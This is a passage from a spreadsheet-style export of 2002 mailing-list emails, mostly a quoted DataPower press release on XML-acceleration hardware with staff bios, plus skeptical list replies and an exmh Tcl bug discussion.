patent-pending XML Generation Three (XG3) technology.\n&gt; \n&gt; "Enterprises are adopting XML at rapid rate to facilitate inter-and \n&gt; intra-company communications but their network infrastructure is ill \n&gt; prepared to support the requirements of this new traffic type. \n&gt; DataPowers XML-acceleration devices enable the wirespeed \n&gt; processing of \n&gt; XML that is required to support next generation enterprise \n&gt; applications," said Eugene Kuznetsov, CTO and founder of DataPower \n&gt; Technology.\n&gt; \n&gt; "DataPower gives companies the ability to use XML thats \n&gt; critical to Web \n&gt; services projects without sacrificing an ounce of \n&gt; performance." A single \n&gt; DataPower acceleration engine delivers the processing power of 10 \n&gt; serversbreaking the performance bottleneck associated with XML \n&gt; processing and delivering an extraordinary return on investment. In \n&gt; addition, the DataPower platform provides enhanced XML security, \n&gt; protection against XML-based denial-of-service attacks, connection of \n&gt; e-business protocols for incompatible XML data streams, load \n&gt; balancing \n&gt; between back-end servers and real-time statistics reports.\n&gt; \n&gt; "In the post-bubble economy, technology investment decisions require \n&gt; laser-focused scrutiny. DataPowers patent-pending technology \n&gt; addresses \n&gt; a very real and growing pain point for enterprises," said Michael \n&gt; Tyrrell of Venrock Associates. "By turbo-charging their networks with \n&gt; DataPowers unique XML-Aware networking technology, companies will be \n&gt; free to adopt next generation Web services without encountering \n&gt; performance and security pitfalls."\n&gt; \n&gt; "We looked long and hard for a company capable of addressing \n&gt; the rapidly \n&gt; growing problems surrounding XML message processing performance and \n&gt; security," said Bill Burnham of Mobius Venture Capital. \n&gt; "DataPower is on \n&gt; their third generation of technology. Their patent pending XML \n&gt; Generation Three (XG3)technology was quite simply the single most \n&gt; compelling technology solution we have seen to date."\n&gt; \n&gt; "XML is not a nice-to-have, it is a must have for enterprises serious \n&gt; about optimizing application efficiency. Since 1999, \n&gt; DataPower has been \n&gt; developing solutions to facilitate enterprise use of XML and Web \n&gt; services," said Jeff Fagnan of Seed Capital Partners. "DataPowers \n&gt; XML-acceleration devices are a key requirement for \n&gt; enterprises that rely \n&gt; on XML for mission critical applications."\n&gt; \n&gt; About Venrock Associates\n&gt; Venrock Associates was founded as the venture capital arm of the \n&gt; Rockefeller Family and continues a tradition of funding entrepreneurs \n&gt; that now spans over seven decades. Laurance S. Rockefeller pioneered \n&gt; early stage venture financing in the 1930s. With over 300 investments \n&gt; over a span of more than 70 years, the firm has an \n&gt; established a track \n&gt; record of identifying and supporting promising early stage, \n&gt; technology- \n&gt; based enterprises. As one of most experienced venture firms in the \n&gt; United States, Venrock maintains a tradition of collaboration with \n&gt; talented entrepreneurs to establish successful, enduring companies. \n&gt; Venrock's continuing goal is to create long-term value by assisting \n&gt; entrepreneurs in building companies from the formative stages. Their \n&gt; consistent focus on Information Technology and Life Sciences-related \n&gt; opportunities provides a reservoir of knowledge and a network of \n&gt; contacts that have proven to be a catalyst for the growth of \n&gt; developing \n&gt; organizations. Venrock's investments have included CheckPoint \n&gt; Software, \n&gt; USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, \n&gt; Media Metrix, 3COM, Intel, and Apple Computer. With offices \n&gt; in New York \n&gt; City, Cambridge, MA, and Menlo Park, CA, Venrock is well \n&gt; positioned to \n&gt; respond to opportunities in any locale. For more information \n&gt; on Venrock \n&gt; Associates, please visit [URL]www.venrock.com[/URL]\n&gt; \n&gt; About Mobius Venture Capital\n&gt; Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 \n&gt; billion U.S.-based private equity venture capital firm managed by an \n&gt; unparalleled team of former CEOs and entrepreneurs, \n&gt; technology pioneers, \n&gt; senior executives from major technology corporations, and \n&gt; leaders from \n&gt; the investment banking community. Mobius Venture Capital specializes \n&gt; primarily in early-stage investments in the areas of: communications \n&gt; systems software and services; infrastructure software and services; \n&gt; professional services; enterprise applications; healthcare \n&gt; informatics; \n&gt; consumer and small business applications; components; and emerging \n&gt; technologies. Mobius Venture Capital combines its technology \n&gt; expertise \n&gt; and broad financial assets with the industry's best entrepreneurs to \n&gt; create a powerhouse portfolio of over 100 of the world's leading high \n&gt; technology companies. Mobius Venture Capital can be contacted by \n&gt; visiting their web site [URL]www.mobiusvc.com[/URL]\n&gt; \n&gt; About Seed Capital Partners\n&gt; Seed Capital Partners is an early-stage venture fund affiliated with \n&gt; SoftBank Corporation, one of the world's leading Internet \n&gt; market forces. \n&gt; Seed Capital manages funds focused primarily on companies addressing \n&gt; Internet-enabled business-to-business digital information technology \n&gt; opportunities, which are located in the Northeastern U.S., the \n&gt; southeastern region of the Province of Ontario, Canada, and \n&gt; Israel. Seed \n&gt; Capitals portfolio includes Spearhead Technologies, \n&gt; Concentric Visions \n&gt; and CompanyDNA. For more information on Seed Capital Partners, please \n&gt; visit [URL]www.seedcp.com[/URL]\n&gt; \n&gt; About DataPower Technology\n&gt; DataPower Technology provides enterprises with intelligent XML-Aware \n&gt; network infrastructure to ensure unparalleled performance, \n&gt; security and \n&gt; manageability of next-generation protocols. DataPowers \n&gt; patent-pending \n&gt; XML Generation Three (XG3) technology powers the industrys first \n&gt; wirespeed XML network devices, enabling secure, high-speed \n&gt; applications \n&gt; and XML Web Services. Founded in 1999, DataPower is now \n&gt; delivering its \n&gt; third generation of technology, providing immediate return on \n&gt; technology \n&gt; investments to industry-leading customers and partners. DataPower is \n&gt; privately held and based in Cambridge, MA. Investors include Mobius \n&gt; Venture Capital, Seed Capital Partners, and Venrock Associates.\n&gt; \n&gt; CONTACT:\n&gt; \n&gt; DataPower Technology, Inc.\n&gt; Kieran Taylor\n&gt; 617-864-0455\n&gt; kieran@datapower.com\n&gt; \n&gt; Schwartz Communications\n&gt; John Moran/Heather Chichakly\n&gt; 781-684-0770\n&gt; datapower@schwartz-pr.com\n&gt; \n&gt; ==============================================================\n&gt; ==========\n&gt; \n&gt; Steve Kelly, chairman and CEO\n&gt; \n&gt; During over twenty years in the technology industry, Steve Kelly has \n&gt; built and managed global enterprise networks, provided consulting \n&gt; services to Fortune 50 businesses, and been involved in the launch of \n&gt; several start-ups. Prior to DataPower, Kelly was an \n&gt; entrepreneur-in-residence at Venrock Associates, and was \n&gt; co-founder of \n&gt; Castle Networks, where he led the company's sales, service \n&gt; and marketing \n&gt; functions. Castle was acquired by Siemens AG in 1999 to \n&gt; create Unisphere \n&gt; Networks, which was subsequently purchased by Juniper Networks. Kelly \n&gt; was an early contributor at Cascade Communications, where he \n&gt; built and \n&gt; managed the company's core switching business; Cascade's \n&gt; annual revenues \n&gt; grew from $2 million to $300 million annually during Kelly's tenure. \n&gt; Kelly also worked at Digital Equipment Corporation where he \n&gt; managed and \n&gt; grew their corporate network to 50,000+ nodes in 28 countries, the \n&gt; largest in the world at the time. Kelly has a B.S. in Information \n&gt; Systems from Bentley College.\n&gt; \n&gt; Eugene Kuznetsov, founder, president and CTO\n&gt; \n&gt; Eugene Kuznetsov is a technology visionary that has been working to \n&gt; address enterprise XML issues since the late 90s. Kuznetsov founded \n&gt; DataPower Technology, Inc. in 1999 to provide enterprises with an \n&gt; intelligent, XML-aware network infrastructure to support \n&gt; next-generation \n&gt; applications. Prior to starting DataPower, Kuznetsov led the Java JIT \n&gt; Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He \n&gt; was also part of the team which developed one of the first clean room \n&gt; Java VM's. This high-speed runtime technology was licensed by some of \n&gt; the industry's largest technology companies, including Apple \n&gt; Computer. \n&gt; He has consulted to numerous companies and worked on a variety of \n&gt; hardware and software engineering problems in the areas of memory \n&gt; management, power electronics, optimized execution engines and \n&gt; application integration. Kuznetsov holds a B.S. in electrical \n&gt; engineering from MIT.\n&gt; \n&gt; Steve Willis, vice president of advanced technology\n&gt; \n&gt; Steve Willis is an accomplished entrepreneur and a pioneer in \n&gt; protocol \n&gt; optimization. Prior to joining DataPower, Willis was \n&gt; co-founder and CTO \n&gt; of Argon Networks, a provider of high-performance switching \n&gt; routers that \n&gt; was acquired by Siemens AG in 1999 to create Unisphere Networks; \n&gt; Unisphere was subsequently purchased by Juniper Networks. \n&gt; Before Argon, \n&gt; Steve was vice president of advanced technology at Bay Networks (now \n&gt; Nortel Networks) where he led both IP and ATM-related technology \n&gt; development and managed a group that generated 24 patent \n&gt; applications, \n&gt; developed a 1 Mbps forwarding engine and led the specification of the \n&gt; ATM Forum's PNNI routing protocol. Most notably, Steve was \n&gt; co-founder, \n&gt; original software director and architect for Wellfleet \n&gt; Communications, a \n&gt; leading pioneer of multi-protocol routers. Wellfleet was rated as the \n&gt; fastest growing company in the U.S. for two consecutive years \n&gt; by Fortune \n&gt; magazine. Willis is currently a member of the Institute of Electrical \n&gt; and Electronics Engineers (IEEE) and the Internet Research Task Force \n&gt; (IRTF) Routing Research Group. Willis has a B.D.I.C. in \n&gt; Computer Science \n&gt; from the University of Massachusetts.\n&gt; \n&gt; Bill Tao, vice president of engineering\n&gt; \n&gt; With a vast understanding of network optimization technologies and \n&gt; extensive experience in LAN and WAN networking, Bill Tao \n&gt; brings over 25 \n&gt; years of critical knowledge to lead DataPower's engineering efforts. \n&gt; Prior to DataPower, Tao was the vice president of engineering for \n&gt; Sycamore Networks, developing a family of metro/regional \n&gt; optical network \n&gt; switches. He is also well acquainted with network optimization \n&gt; techniques as he was previously vice president of engineering at \n&gt; InfoLibria, where he led development and software quality assurance \n&gt; engineering for a family of network caching products. Tao has held \n&gt; senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao \n&gt; received a B.S. in Electrical Engineering from the University of \n&gt; Connecticut and an M.S. in Computer Science from the University of \n&gt; Illinois.\n&gt; \n&gt; Kieran Taylor, director of product marketing\n&gt; \n&gt; Kieran Taylor has an accomplished record as a marketing professional, \n&gt; industry analyst and journalist. Prior to joining DataPower, \n&gt; Taylor was \n&gt; the director of product management and marketing for Akamai \n&gt; Technologies \n&gt; (NASDAQ: AKAM). As an early contributor at Akamai, he helped \n&gt; develop the \n&gt; company's initial positioning and led the technical development and \n&gt; go-to-market activities for Akamai's flagship EdgeSuite service. \n&gt; Taylor's early contribution helped position the service provider to \n&gt; secure a $12.6 billion IPO. He has also held senior marketing \n&gt; management \n&gt; positions at Nortel Networks, Inc. and Bay Networks. Taylor was \n&gt; previously an analyst at TeleChoice, Inc. and the Wide Area Networks \n&gt; editor for Data Communications, a McGraw Hill publication. \n&gt; Taylor holds \n&gt; a B.A. in Print Journalism from the Pennsylvania State \n&gt; University School \n&gt; of Communications.\n&gt; \n&gt; =================================================================\n&gt; Board of Advisors\n&gt; \n&gt; Mark Hoover\n&gt; Mark Hoover is President and co-founder of Acuitive, Inc., a start-up \n&gt; accelerator. With over 20 years experience in the networking \n&gt; industry, \n&gt; Hoover's expertise spans product development, marketing, and business \n&gt; development. Before launching Acuitive, Hoover worked at AT&amp;T Bell \n&gt; Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay \n&gt; Networks, where \n&gt; he played a role in the development of key technologies, such as \n&gt; 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet \n&gt; traffic management, and edge WAN switch industries.\n&gt; \n&gt; George Kassabgi\n&gt; Currently Vice President of Engineering at BEA Systems, Mr. \n&gt; Kassabgi has \n&gt; held executive-level positions in engineering, sales and \n&gt; marketing, and \n&gt; has spearheaded leading-edge developments in the application server \n&gt; marketplace since 1996. He is widely known for his regular speaking \n&gt; engagements at JavaOne, as well as columns and contributions \n&gt; in JavaPro, \n&gt; Java Developer's Journal and other publications. In addition \n&gt; to being a \n&gt; venerated Java expert, George Kassabgi holds a patent on SmartObject \n&gt; Technology, and authored the technical book Progress V8.\n&gt; \n&gt; Marshall T. Rose\n&gt; Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He \n&gt; formerly held the position of the Internet Engineering Task \n&gt; Force (IETF) \n&gt; Area Director for Network Management, one of a dozen individuals who \n&gt; oversaw the Internet's standardization process. Rose is the author of \n&gt; several professional texts on subjects such as Internet Management, \n&gt; Electronic Mail, and Directory Services, which have been published in \n&gt; four languages. He is well known for his implementations of core \n&gt; Internet technologies (such as POP, SMTP, and SNMP) and OSI \n&gt; technologies \n&gt; (such as X.500 and FTAM). Rose received a PhD in Information and \n&gt; Computer Science from the University of California, Irvine, in 1984.\n&gt; \n&gt;</t>
  </si>
  <si>
    <t>www.venrock.com www.mobiusvc.com www.seedcp.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Brian Chapman &lt;wt046@victoria.tc.ca&gt;\nDate: Tue, 27 Aug 2002 18:13:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:13:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>Brian Chapman &lt;wt046@victoria.tc.ca&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Not a materialisation, but a transfiguration</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002 MICGRANGER@aol.com wrote:\n\n&gt; Concerning this mail, what is your intention?\n\nWhen posting to this list excerpts from books I've just read, I usually\nrefrain from adding any comments, letting the listmembers interpret them\nas they see fit.\n\nBut since you asked....\n\nI chose to post this text simply because I thought it was a particularly\nrisible example of Doyle's invincible faith and his refusal to accept the\nfucking obvious.\n\nbc\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Tue, 27 Aug 2002 18:08:12 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:08:12 -0700</t>
  </si>
  <si>
    <t>You can also duplicate thiswith MsgChange - noshow at the Tcl prompt in the Log window.  I suspect that the sequence parser, which understands things like 5-22 to mean messages 5 through 22 is confused when asked to add/remove message "-" from a sequence. If we are allowed to assume 8.2 or higher, which we can't really, then we could add if {![string is integer $select(sel)]} {    # bail out of message select mode } to the SelectTypein procedure. We can probably survive with if {![regexp {^[0-9]+$} $select(sel)]} {     #bail out of message select mode } &gt;&gt;&gt;Robert Elz said:  &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500  &gt;     From:        Chris Garrigues   &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;  &gt;   &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll  &gt;   | see what I can do about it (or if I can't, I'll hand it off to  Brent).  &gt;   &gt; Don't worry too much about it, you seem to have plenty of other things  &gt; to do in the immediate future, and this one isn't so critical that people  &gt; can't use the code in normal ways.  &gt;   &gt; But, to make it happen, type (with normal key bindings) any digit, so the  &gt; code thinks you're trying a message number, then backspace, so the digit  &gt; goes away, then '-' (other junk characters don't seem to have the  &gt; problem, I have just been playing).   That will do it (every time).  &gt;   &gt; That is: 0 ^h -  &gt;   &gt; Once you get into that state, the same traceback occurs for every  &gt; character you type, until a message is selected with the mouse.  &gt;   &gt; This is looking like it might be easy to find and fix, so I'll take a  &gt; look at it later. -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Tue, 27 Aug 2002 17:22:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 17:22:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002, Rohit Khare wrote:\n\n&gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed\n&gt; specifically to process XML data. Unlike competing solutions that\n&gt; process XML data in software, DataPower's device processes the data in\n&gt; hardware -- a technology achievement that provides greater performance,\n&gt; according to company officials.\n\nNow, to do this, we all know they have to be cracking the strong crypto used\non all transaction in order to process them... So this has some preaty heavy\nimplications, unless it's just BS.\n\n&gt; Kelly explained that converting data into XML increases the file size up\n&gt; to 20 times. This, he said, makes processing the data very taxing on\n&gt; application servers; DataPower believes an inline device is the best\n&gt; alternative.\n\nOr.... you could just not bloat it 20x to begin with. Nah! (that was the\nwhole point of XML afterall, to sell more CPUs - much like Oracle's use of\nJava allows them to sell 3x more CPU licenses due to the performance hit)\n\n&gt; In addition to the large file sizes, security is also of paramount\n&gt; importance in the world of XML.\n&gt;\n&gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly\n&gt; said. "A SOAP packet with XML will go straight through a firewall.\n&gt; Firewalls are blind to XML today."\n\nAgain, see above... they _are_ claiming to decode the crypto...\n\n&gt; "Our XG3 execution core converts XML to machine code," said Kelly,\n\nMmmmmmmmmmm, machine code, never a good idea ;)\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com</t>
  </si>
  <si>
    <t>To: "'Rohit Khare '" &lt;khare@alumni.caltech.edu&gt;,\nFrom: Paul Sholtz &lt;paul@privacyright.com&gt;\nDate: Tue, 27 Aug 2002 17:17:41 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 17:17:41 -0700</t>
  </si>
  <si>
    <t>Paul Sholtz &lt;paul@privacyright.com&gt;</t>
  </si>
  <si>
    <t>"'Rohit Khare '" &lt;khare@alumni.caltech.edu&gt;,</t>
  </si>
  <si>
    <t>Hardware acceleration for SSL makes sense since PKI can slow down a\ntransaction by as much as 1,000-fold. Per this article, XML formatting only\nincreases doc size by about 20-fold.. I'm not sure there are enough "powers\nof ten" in there to justify hardware acceleration. \n\nExpect the next major release from DataPower to be the revolutionary new\n"email chip" - allows you to offload the sending and receiving of email\nmessages onto dedicated hardware while you get on w/ more important things\n.. like listening to MP3s..\n\nBest, \nPaul Sholtz\n\n-----Original Message-----\nFrom: Rohit Khare\nTo: fork@spamassassin.taint.org\nSent: 8/27/02 3:00 PM\nSubject: DataPower announces XML-in-silicon\n\nNo analysis yet... don't know what to make of it yet. But here's the raw\n\nbits for all to peruse and check out what's really going on... Best, \nRohit\n\n===========================================================\n\nDataPower delivers XML acceleration device\nByScott Tyler Shafer\nAugust 27, 2002 5:46 am PT\n\nDATAPOWER TECHNOLOGY ON Monday unveiled its network device designed \nspecifically to process XML data. Unlike competing solutions that \nprocess XML data in software, DataPower's device processes the data in \nhardware -- a technology achievement that provides greater performance, \naccording to company officials.\n\nThe new device, dubbed DataPower XA35 XML Accelerator, is the first in a\n\nfamily of products expected from the Cambridge, Mass.-based startup. The\n\nDataPower family is based on a proprietary processing core technology \ncalled XG3 that does the analysis, parsing, and processing of the XML \ndata.\n\nAccording to Steve Kelly, CEO of DataPower, the XA35 Accelerator was \nconceived to meet the steady adoption of XML, the anticipated future \nproliferation of Web services, and as a means to share data between two \nbusinesses.\n\n"Our vision is to build out an XML-aware infrastructure," Kelly said. \n"The XA35 is the first of a family."\n\nKelly explained that converting data into XML increases the file size up\n\nto 20 times. This, he said, makes processing the data very taxing on \napplication servers; DataPower believes an inline device is the best \nalternative.\n\nIn addition to the large file sizes, security is also of paramount \nimportance in the world of XML.\n\n"Today's firewalls are designed to inspect HTTP traffic only," Kelly \nsaid. "A SOAP packet with XML will go straight through a firewall. \nFirewalls are blind to XML today."\n\nFuture products in DataPowers family will focus more specifically on \nsecurity, especially as Web services proliferate, Kelly said.\n\nAccording to DataPower, most existing solutions to offload XML \nprocessing are homegrown and done in software -- an approach the company\n\nitself tried initially and found to be inadequate with regards to speed \nand security. After trying the software path, the company turned to \ncreating a solution that would process XML in hardware.\n\n"Our XG3 execution core converts XML to machine code," said Kelly, \nadding that to his knowledge no other company's solution does. Kelly \nsaid in the next few months he expects the market to be flooded with \ntechnologies that claim to do XML processing -- claims that he believes \nwill be mostly false.\nOther content-aware switches, such as SSL (secure socket layer) \naccelerators and load balancers, look at the first 64 bytes of a packet,\n\nwhile the XA35 provides deeper packet inspection, looking at 1,400 bytes\n\nand thus enabling greater processing of XML data, Kelly explained.\n\nThe 1U-high network device has been tested against a large collection of\n\nXML and XSL data types and can learn new flavors of the markup language \nas they pass through the device.\n\nThe XA35 can be deployed in proxy mode behind a firewall and a load \nbalancer, and it will inspect all traffic that passes and will identify \nand process those packets that are XML, Kelly said.\n\nIn addition to proxy mode, the device can also be used as an application\n\nco-processor. This deployment method gives administrators more granular \ncontrol over what data is inspected and the application server itself \ncontrols the device.\n\nDataPower is not the only company chasing this emerging market. Startup \nSarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch in\n\nMay, and earlier this month Tarari, an Intel spin-off, launched with a \nfocus on content processing and acceleration.\nThe DataPower device is now available, priced starting at $54,995. The \ncompany has announced one customer to date and says the product is in \nfield trails at a number of other enterprises.\n\n========================================================================\n=\n\nDataPower has been addressing enterprise networking needs since it was \nfounded in early 1999 by Eugene Kuznetsov, a technology visionary who \nforesaw the adverse effects XML and other next generation protocols \nwould have on enterprise networks. Long before industry interest in XML \ngrew, Kuznetsov assembled a team of world-class M.I.T. engineers and \ndesigned the industry's first solutions to address the unique \nrequirements for processing XML. The first such solution was a software \ninterpreter called DGXT. This software-based approach to XML processing \nis still licensed by many companies for use in their own products today.\n\nLeveraging the detailed knowledge and customer experience gained from \ndeveloping software-based accelerators, Kuznetsov's team raised the bar \nand designed a system for processing XML in purpose-built hardware. In \n2001, DataPower's effort produced XML Generation Three (XG3), the \nindustry's fastest technology for XML processing, bar none.\n\nToday, XG3 technology powers the industry's first wire-speed XML \nnetwork devices, enabling secure, high-speed applications and XML Web \nServices. While other companies are just now marketing first versions of\n\nproducts, DataPower is delivering its third generation of technology, \nproviding an immediate return on technology investments to \nindustry-leading customers and partners.\n\nDataPower's M.I.T. heritage is complemented by a management team that \nbrings decades of experience in the networking and computing industries,\n\ndrawing veteran leaders from several successful companies including \nAkamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.\n\n========================================================================\n=\n\nDataPower Technology Secures $9.5 Million in Funding\n\nVenrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer\n\nin XML-Aware Networking for Web Services\n\nCAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the \nleading provider of XML-Aware network infrastructure, today announced \nthat it has secured $9.5 million in series B financing. Investors for \nthis round include Venrock Associates, Mobius Venture Capital and Seed \nCapital Partners. Michael Tyrrell, of Venrock, Bill Burnham, of Mobius, \nand Jeff Fagnan, of Seed Capital, have joined DataPowers Board of \nDirectors.\n\nDataPower will use this funding to accelerate development, marketing and\n\nsales of the companys breakthrough technology for XML-Aware networking.\n\nFounded in 1999, DataPower invented the worlds first intelligent XML \nnetworkingdevices, capable of transforming XML traffic and transactions\n\nat the wire-speed enterprises need to effectively embrace Web services \nand other XML-centric initiatives. DataPowers solutions are based on \nits patent-pending XML Generation Three (XG3) technology.\n\n"Enterprises are adopting XML at rapid rate to facilitate inter-and \nintra-company communications but their network infrastructure is ill \nprepared to support the requirements of this new traffic type. \nDataPowers XML-acceleration devices enable the wirespeed processing of \nXML that is required to support next generation enterprise \napplications," said Eugene Kuznetsov, CTO and founder of DataPower \nTechnology.\n\n"DataPower gives companies the ability to use XML thats critical to Web\n\nservices projects without sacrificing an ounce of performance." A single\n\nDataPower acceleration engine delivers the processing power of 10 \nserversbreaking the performance bottleneck associated with XML \nprocessing and delivering an extraordinary return on investment. In \naddition, the DataPower platform provides enhanced XML security, \nprotection against XML-based denial-of-service attacks, connection of \ne-business protocols for incompatible XML data streams, load balancing \nbetween back-end servers and real-time statistics reports.\n\n"In the post-bubble economy, technology investment decisions require \nlaser-focused scrutiny. DataPowers patent-pending technology addresses \na very real and growing pain point for enterprises," said Michael \nTyrrell of Venrock Associates. "By turbo-charging their networks with \nDataPowers unique XML-Aware networking technology, companies will be \nfree to adopt next generation Web services without encountering \nperformance and security pitfalls."\n\n"We looked long and hard for a company capable of addressing the rapidly\n\ngrowing problems surrounding XML message processing performance and \nsecurity," said Bill Burnham of Mobius Venture Capital. "DataPower is on\n\ntheir third generation of technology. Their patent pending XML \nGeneration Three (XG3)technology was quite simply the single most \ncompelling technology solution we have seen to date."\n\n"XML is not a nice-to-have, it is a must have for enterprises serious \nabout optimizing application efficiency. Since 1999, DataPower has been \ndeveloping solutions to facilitate enterprise use of XML and Web \nservices," said Jeff Fagnan of Seed Capital Partners. "DataPowers \nXML-acceleration devices are a key requirement for enterprises that rely\n\non XML for mission critical applications."\n\nAbout Venrock Associates\nVenrock Associates was founded as the venture capital arm of the \nRockefeller Family and continues a tradition of funding entrepreneurs \nthat now spans over seven decades. Laurance S. Rockefeller pioneered \nearly stage venture financing in the 1930s. With over 300 investments \nover a span of more than 70 years, the firm has an established a track \nrecord of identifying and supporting promising early stage, technology- \nbased enterprises. As one of most experienced venture firms in the \nUnited States, Venrock maintains a tradition of collaboration with \ntalented entrepreneurs to establish successful, enduring companies. \nVenrock's continuing goal is to create long-term value by assisting \nentrepreneurs in building companies from the formative stages. Their \nconsistent focus on Information Technology and Life Sciences-related \nopportunities provides a reservoir of knowledge and a network of \ncontacts that have proven to be a catalyst for the growth of developing \norganizations. Venrock's investments have included CheckPoint Software, \nUSinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, \nMedia Metrix, 3COM, Intel, and Apple Computer. With offices in New York \nCity, Cambridge, MA, and Menlo Park, CA, Venrock is well positioned to \nrespond to opportunities in any locale. For more information on Venrock \nAssociates, please visit [URL]www.venrock.com[/URL]\n\nAbout Mobius Venture Capital\nMobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 \nbillion U.S.-based private equity venture capital firm managed by an \nunparalleled team of former CEOs and entrepreneurs, technology pioneers,\n\nsenior executives from major technology corporations, and leaders from \nthe investment banking community. Mobius Venture Capital specializes \nprimarily in early-stage investments in the areas of: communications \nsystems software and services; infrastructure software and services; \nprofessional services; enterprise applications; healthcare informatics; \nconsumer and small business applications; components; and emerging \ntechnologies. Mobius Venture Capital combines its technology expertise \nand broad financial assets with the industry's best entrepreneurs to \ncreate a powerhouse portfolio of over 100 of the world's leading high \ntechnology companies. Mobius Venture Capital can be contacted by \nvisiting their web site [URL]www.mobiusvc.com[/URL]\n\nAbout Seed Capital Partners\nSeed Capital Partners is an early-stage venture fund affiliated with \nSoftBank Corporation, one of the world's leading Internet market forces.\n\nSeed Capital manages funds focused primarily on companies addressing \nInternet-enabled business-to-business digital information technology \nopportunities, which are located in the Northeastern U.S., the \nsoutheastern region of the Province of Ontario, Canada, and Israel. Seed\n\nCapitals portfolio includes Spearhead Technologies, Concentric Visions \nand CompanyDNA. For more information on Seed Capital Partners, please \nvisit [URL]www.seedcp.com[/URL]\n\nAbout DataPower Technology\nDataPower Technology provides enterprises with intelligent XML-Aware \nnetwork infrastructure to ensure unparalleled performance, security and \nmanageability of next-generation protocols. DataPowers patent-pending \nXML Generation Three (XG3) technology powers the industrys first \nwirespeed XML network devices, enabling secure, high-speed applications \nand XML Web Services. Founded in 1999, DataPower is now delivering its \nthird generation of technology, providing immediate return on technology\n\ninvestments to industry-leading customers and partners. DataPower is \nprivately held and based in Cambridge, MA. Investors include Mobius \nVenture Capital, Seed Capital Partners, and Venrock Associates.\n\nCONTACT:\n\nDataPower Technology, Inc.\nKieran Taylor\n617-864-0455\nkieran@datapower.com\n\nSchwartz Communications\nJohn Moran/Heather Chichakly\n781-684-0770\ndatapower@schwartz-pr.com\n\n========================================================================\n\nSteve Kelly, chairman and CEO\n\nDuring over twenty years in the technology industry, Steve Kelly has \nbuilt and managed global enterprise networks, provided consulting \nservices to Fortune 50 businesses, and been involved in the launch of \nseveral start-ups. Prior to DataPower, Kelly was an \nentrepreneur-in-residence at Venrock Associates, and was co-founder of \nCastle Networks, where he led the company's sales, service and marketing\n\nfunctions. Castle was acquired by Siemens AG in 1999 to create Unisphere\n\nNetworks, which was subsequently purchased by Juniper Networks. Kelly \nwas an early contributor at Cascade Communications, where he built and \nmanaged the company's core switching business; Cascade's annual revenues\n\ngrew from $2 million to $300 million annually during Kelly's tenure. \nKelly also worked at Digital Equipment Corporation where he managed and \ngrew their corporate network to 50,000+ nodes in 28 countries, the \nlargest in the world at the time. Kelly has a B.S. in Information \nSystems from Bentley College.\n\nEugene Kuznetsov, founder, president and CTO\n\nEugene Kuznetsov is a technology visionary that has been working to \naddress enterprise XML issues since the late 90s. Kuznetsov founded \nDataPower Technology, Inc. in 1999 to provide enterprises with an \nintelligent, XML-aware network infrastructure to support next-generation\n\napplications. Prior to starting DataPower, Kuznetsov led the Java JIT \nCompiler effort for Microsoft Internet Explorer for Macintosh 4.0. He \nwas also part of the team which developed one of the first clean room \nJava VM's. This high-speed runtime technology was licensed by some of \nthe industry's largest technology companies, including Apple Computer. \nHe has consulted to numerous companies and worked on a variety of \nhardware and software engineering problems in the areas of memory \nmanagement, power electronics, optimized execution engines and \napplication integration. Kuznetsov holds a B.S. in electrical \nengineering from MIT.\n\nSteve Willis, vice president of advanced technology\n\nSteve Willis is an accomplished entrepreneur and a pioneer in protocol \noptimization. Prior to joining DataPower, Willis was co-founder and CTO \nof Argon Networks, a provider of high-performance switching routers that\n\nwas acquired by Siemens AG in 1999 to create Unisphere Networks; \nUnisphere was subsequently purchased by Juniper Networks. Before Argon, \nSteve was vice president of advanced technology at Bay Networks (now \nNortel Networks) where he led both IP and ATM-related technology \ndevelopment and managed a group that generated 24 patent applications, \ndeveloped a 1 Mbps forwarding engine and led the specification of the \nATM Forum's PNNI routing protocol. Most notably, Steve was co-founder, \noriginal software director and architect for Wellfleet Communications, a\n\nleading pioneer of multi-protocol routers. Wellfleet was rated as the 